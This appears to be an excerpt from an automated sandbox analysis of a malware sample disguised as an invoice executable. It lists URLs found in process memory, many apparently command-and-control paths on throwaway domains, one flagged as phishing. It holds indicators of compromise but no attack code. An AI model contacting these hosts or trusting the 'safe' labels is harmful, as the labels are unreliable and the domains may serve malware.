                                          http://www.light-in-the-heavens.comReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.huskyacres.net/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://tempuri.org/DataSet1.xsdINVOICE - MV CNC BANGKOK - ST24PJ-278.exefalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4576280943.000000000973C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.0909000000.com/ps94/www.parsendustriyel.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://word.office.comMexplorer.exe, 00000006.00000002.4582922862.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984825740.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.huskyacres.netexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.0909000000.comReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.streamfly.video/ps94/www.forluvofcomedy.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.xsmci844n.xyz/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.parsendustriyel.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hregrhherdhretdhrt.xyz/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whatsapp-p.vip/ps94/www.0909000000.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: phishing
                                          		unknown
                                          http://www.xsmci844n.xyz/ps94/www.whatsapp-p.vipexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rgrogerscreations.comReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.xsmci844n.xyzReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://wns.windows.com/eexplorer.exe, 00000006.00000002.4576902111.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2150317707.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINVOICE - MV CNC BANGKOK - ST24PJ-278.exe, 00000000.00000002.2140466216.00000000029F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.0909000000.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.htgithub.com/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.parsendustriyel.comReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.whatsapp-p.vipReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000003.2979546205.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981509755.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2982113001.000000000C3BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984151863.000000000C40D000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.amycostellospeech.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.parsendustriyel.com/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.light-in-the-heavens.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hregrhherdhretdhrt.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.hregrhherdhretdhrt.xyzReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.streamfly.video/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.norlac.xyzReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000002.4582720574.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://outlook.comeexplorer.exe, 00000006.00000002.4582922862.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2984825740.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2153411918.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000002.4576902111.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2150317707.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.amycostellospeech.com/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.amycostellospeech.comReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.forluvofcomedy.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.vpdyt637j.xyz/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com/Iexplorer.exe, 00000006.00000002.4576280943.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2148343923.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.parsendustriyel.com/ps94/www.vpdyt637j.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rgrogerscreations.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://status.squarespace.comexplorer.exe, 00000006.00000002.4584969121.0000000010C6F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000007.00000002.4572473612.000000000513F000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.vpdyt637j.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.amycostellospeech.com/ps94/www.norlac.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.rgrogerscreations.com/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.t5u2s.xyzexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.microexplorer.exe, 00000006.00000002.4571829030.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4574902482.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2145185137.0000000007B50000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.t5u2s.xyz/ps94/explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.huskyacres.net/ps94/www.rgrogerscreations.comexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.streamfly.videoexplorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.norlac.xyz/ps94/explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.streamfly.videoReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.forluvofcomedy.comReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.vpdyt637j.xyzReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000006.00000002.4573839893.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2142795161.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.t5u2s.xyzReferer:explorer.exe, 00000006.00000003.3079945494.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4584055154.000000000C4DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979426724.000000000C4CD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076095756.000000000C4DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
